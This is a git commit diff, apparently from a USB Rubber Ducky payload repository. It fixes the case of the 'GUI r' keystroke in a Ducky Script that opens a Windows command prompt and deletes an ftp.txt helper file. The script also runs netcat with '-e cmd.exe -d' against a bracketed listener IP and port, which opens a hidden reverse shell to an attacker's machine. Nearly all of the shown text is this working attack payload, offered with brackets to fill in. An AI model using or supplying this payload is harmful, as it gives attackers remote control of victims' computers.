"GUI R" -> "GUI r"

This commit is contained in:
Tim Mattison 2014-07-22 16:22:30 -07:00
parent 08c066a31d
commit 66ba1bebdd
1 changed files with 3 additions and 3 deletions

View File

@ -7,7 +7,7 @@ This script will:
Fill in the required information where you see the brackets. Fill in the required information where you see the brackets.
```c ```c
DELAY 10000 DELAY 10000
GUI R GUI r
DELAY 200 DELAY 200
STRING cmd STRING cmd
ENTER ENTER
@ -41,12 +41,12 @@ ENTER
STRING del ftp.txt & exit STRING del ftp.txt & exit
ENTER ENTER
DELAY 2000 DELAY 2000
GUI R GUI r
DELAY 200 DELAY 200
STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d
ENTER ENTER
DELAY 2000 DELAY 2000
GUI R GUI r
DELAY 200 DELAY 200
STRING cmd STRING cmd
ENTER ENTER